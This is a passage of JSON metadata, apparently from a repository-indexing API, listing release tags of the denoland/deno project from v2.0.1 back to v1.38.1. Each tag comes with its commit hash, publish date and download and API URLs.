v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposito